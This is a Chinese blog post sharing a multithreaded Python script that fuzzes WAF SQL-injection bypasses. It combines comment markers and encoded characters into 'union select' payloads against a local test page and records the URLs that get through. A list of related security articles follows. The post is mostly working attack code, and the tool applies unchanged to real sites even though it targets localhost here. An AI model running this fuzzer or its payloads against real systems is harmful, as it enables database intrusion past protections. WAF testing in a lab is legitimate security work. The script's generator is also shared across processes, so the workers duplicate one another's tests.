多线程FUZZ WAF的python脚本

最新推荐文章于 2024-05-10 15:35:10 发布
最新推荐文章于 2024-05-10 15:35:10 发布
阅读量2.3k 收藏 7
点赞数 3
分类专栏: 网络安全 文章标签: python waf FUZZ 
#!/usr/bin/python
#coding:utf-8

'''
        学习了Va1n3R的注入绕过思路,自己也学习一下fuzz脚本的编写
        规则库还是使用Va1n3R的
        fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
        fuzz_sz = ['',' ']
        fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
        By T00ls.Net
'''

import sys,requests,time,threading,random
from multiprocessing import Process,Queue


fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
fuzz_sz = ['',' ']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
fuzz = fuzz_zs+fuzz_sz+fuzz_ch

headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0"}
i=0
glen = len(fuzz)**6

lock = threading.Lock()

def generator():
        
        for a in fuzz:
                for b in fuzz:
                        for c in fuzz:
                                for d in fuzz:
                                        for e in fuzz:
                                                for f in fuzz:
                                                        st = a+b+c+d+e+f
                                                        yield st
g = generator()
'''
def geti():
        global i
        i+=1
        return i
'''
def task(q,l):
        for x in range(l):
                i = int(q.get())
                i+=1
                q.put(i)
                lock.acquire()
                st=g.__next__()
                try:
                        url = "http://127.0.0.1/fuzz/index.php?id=1"
                        url = url+" /*!union"+st+"select*/ 1,2,3"
                        sys.stdout.write(' '*30 + '\r')
                        #sys.stdout.flush()
                        print("[-] new URL: %s"%url)
                        sys.stdout.write("正在测试:%d/%d"%(i,glen))
                        sys.stdout.write(' '*30 + '\r')
                        sys.stdout.flush()
                finally:
                        lock.release()
                try:
                        res = requests.get(url,headers=headers)
                        if '<td>id</td>' in res.text:
                                lock.acquire()
                                try:
                                        sys.stdout.write("[+] Find Bypass URL: %s\n"%url)
                                        with open('./apache_p.txt','a+') as f:
                                                f.write(url+'\n')
                                finally:
                                        lock.release()
                except:pass
                time.sleep(random.random())
def main():
        q = Queue()
        g = generator()
        process_num=100
        global glen
        #将g分组
        print("正在为list分组....")
        # l 表示每个组的元素个数
        l = glen/process_num
        #创建线程并为线程分配list
        q.put(1)
        for j in range(process_num):
                l = int(l)
                if j!=process_num:
                        p = Process(target=task,args=(q,l))
                else:
                        #为了保证生成器的元素全部使用
                        l =l + glen%process_num
                        p = Process(target=task,args=(q,l))
                p.start()

if __name__ == '__main__':
        main()

夜班机器人
关注
专栏目录
XSS检测工具XSStrike源码分析及使用记录
墨痕诉清风的博客
08-25 949
如果您的操作系统不支持此功能,或者您不想这样做,则可以简单地从命令行添加标头,\n并按如下所示分隔: python xsstrike.py -u http://example.com/page.php?q=query --headers "Accept-Language: en-US\nCookie: null",要使延迟最小,请使用-d选项将延迟设置为1秒。想要将有效负载注入URL路径,例如http://example.com/search/,您可以使用--pathswitch来实现。
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5548
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Python-Wafid识别和指纹Web应用防火墙WAF产品
08-10
Wafid识别和指纹Web应用防火墙(WAF)产品
WAF Bypass FUZZ脚本
weixin_33951761的博客
06-27 209
分享两个小脚本,用来WAF Bypass简单FUZZ的 第一个:先生成一个字典,带入搭建的环境进行FUZZ,针对某些软WAF挺好用的,可FUZZ出不少姿势出来,记得先把CC攻击加入白名单才行哦。。。 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import urllib import urllib2 i...
python fuzz脚本(利用数组)
04-29 855
python fuzz脚本(利用数组) 1 import types 2 a = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v...
pythonfuzz:覆盖率指导的python模糊测试
02-06
fuzzit.dev被GitLab ,此仓库的新家 pythonfuzz:适用于python的覆盖率指导的模糊测试 PythonFuzz是覆盖引导用于测试Python包。 模糊搜索python之类的安全语言是一种强大的策略,可用于查找未处理的异常,逻辑错误,由挂起和过多的内存使用引起的逻辑错误和拒绝服务引起的安全性错误。 除经典的单元测试外,模糊测试在现实世界的软件中还可以视为一种强大而有效的策略。 用法 模糊目标 第一步是实现以下功能(也称为模糊目标)。 这是内置html模块的简单模糊功能示例 from html . parser import HTMLParser from pytho
Python安全开发——多线程Fuzz&Waf 异或免杀&爆破
qi_SJQ_的博客
02-23 1449
1.概述: 知识点: 协议模块使用,Request 爬虫技术,简易多线程技术,编码技术,Bypass 后门技术 目的: 掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合 Fuzz 吊打 WAF 等 2.简单多线程技术、FTP 模块实现协议爆破脚本: queue,threading 模块使用、ftplib 模块使用:遍历用户及密码字典、尝试连接执行命令判断 ftp模块使用:https://www.cnblogs.com/xiao-apple36/p/9675185.html https://
XSS-Fuzz的艺术
prettyX的博客
12-08 1496
BugBank整理总结。 1、什么是Fuzz 一种基于黑盒的自动化软件模糊测试技术。 可向目标发送随机或精心构造的数据作为计算机输入,来触发非常规反馈以达到检测漏洞的目的。 一般的Fuzz工具自带完备的异常检测机制,发送数据后能精准查出哪些Payload导致了非常规反馈,在输出中将这些触发异常的Payload列出,大大降低了人工测试成本,渗透测试人员只需关注感兴趣的部分。 BruteXS...
李明珂笔记
m0_67879481的博客
04-07 347
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclu...
Python-Fuzzinator随机测试框架
08-10
Fuzzinator随机测试框架
Python多线程Fuzz&&Waf异或免杀&爆破
share something here
04-11 567
Python多线程Fuzz&Waf异或免杀&爆破学习内容和目的简单多线程脚本利用FTP模块实现协议爆破脚本不含多线程简单爆破引入queue和threading配合Fuzz实现免杀异或Shell脚本 注意sys.argv传参数必要时需要转换int型。 学习内容和目的 知识点:协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术 学习目的:掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打Waf 简单多线程脚本 queue,threa
python多线程结合二分法算法|命令注入与盲注
tempulcc的博客
09-28 659
实战python多线程结合二分法算法应用命令注入基于时间的盲注 本文采用threading、queue模块启用多线程,结合二分法算法思想(递归、非递归两种方法)实战natas的第16关、第17关,可大幅提升程序寻找通关密码的效率。 命令注入 URL:http://natas16.natas.labs.overthewire.org Username:natas16 Password:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh 源码: <? $key = ""; if(arr
Python字符串模糊匹配工具:TheFuzz 库详解
aobulaien001的博客
01-11 3341
TheFuzz 是一个提供多种字符串比较和模糊匹配算法的 Python 库。它提供了多种算法用于计算字符串相似度,如 Levenshtein 距离、Jaccard 系数、TF-IDF 等。这些方法能够帮助我们找到字符串之间的相似度,而不仅仅是精确匹配。print(f"相似度:{similarity_ratio}%")TheFuzz库为Python开发者提供了一种强大的工具,用于模糊字符串匹配和相似度计算。通过选择合适的算法和方法,可以在各种场景下应用模糊字符串匹配。
Python中实现模糊匹配的魔法库:FuzzyWuzzy
小詹学python的博客
03-02 1657
​​在日常开发工作中,经常会遇到这样的一个问题:要对数据中的某个字段进行匹配,但这个字段有可能会有微小的差异。比如同样是招聘岗位的数据,里面省份一栏有的写“广西”,有的写“广西壮族自治区”,甚至还有写“广西省”……为此不得不增加许多代码来处理这些情况。今天跟大家分享FuzzyWuzzy一个简单易用的模糊字符串匹配工具包。让你轻松解决烦恼的匹配问题!1. 前言在处理数据的过程中,难免会遇到下面类似的...
python进行接口测试(详细教程)
最新发布
菜鸟学识的博客
05-10 3025
前言其实我觉得接口测试很简单,比一般的功能测试还简单,现在找工作好多公司都要求有接口测试经验,也有好多人问我什么是接口测试,本着不懂也要装懂的态度,我会说:所谓接口测试就是通过测试不同情况下的入参与之相应的出参信息来判断接口是否符合或满足相应的功能性、安全性要求。
探索API Fuzz:智能测试工具,保障您的接口安全
gitblog_00015的博客
04-23 438
探索API Fuzz:智能测试工具,保障您的接口安全 api-fuzzpython restful api fuzz test项目地址:https://gitcode.com/gh_mirrors/ap/api-fuzz 项目简介 在数字化日益普及的今天,API(应用程序编程接口)成为了数据交换和系统集成的核心。然而,随着API数量的增长,其安全性与稳定性问题也变得尤为重要。为此,我们推荐一个名...
python - scapy - fuzz
Nixawk
05-24 1780
Start a tcp sniffer, and monitor tcp response. We can find surprise at sometimes.>>> sniff(prn=lambda x:x.show(), filter="(tcp port 80) and (ip dst 192.168.1.107 or ip src 192.168.1.107)") ###[ Etherne
Python攻防-Fuzz绕过安全狗进行SQL注入
道阻且长,行则将至。
04-19 3845
文章目录前言WAF部署WAF简述网站安全狗Fuzz脚本绕过Fuzz脚本脚本效果SQLMap绕过Fuzz关键词tamper绕过总结 前言 在渗透测试过程中,经常会遇到很多 Web 站点部署了 WAF,这个时候使用常规的 Payload 进行 XSS、SQL 注入的检测避免不了被 WAF 拦截阻断的命运。 Fuzz 模糊测试是一种有效的检测 WAF 过滤规则缺陷并尝试进行 WAF 绕过的技术,本文将以“PhpStudy+DVWA+ 安全狗v4.0”的实验环境演示 Fuzz 测试绕过 WAFWAF部署 我在
绕过软WAF技巧:Python基础与Fuzz脚本实战
"该资源是漏洞银行大咖面对面技术讲座的一部分,由@13nR主讲,主题为...这个讲座通过讲解Python基础和requests库的使用,为绕过软WAF提供了一定的技术基础,帮助信息安全专家理解和构建能够避开WAF检测的工具或脚本
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值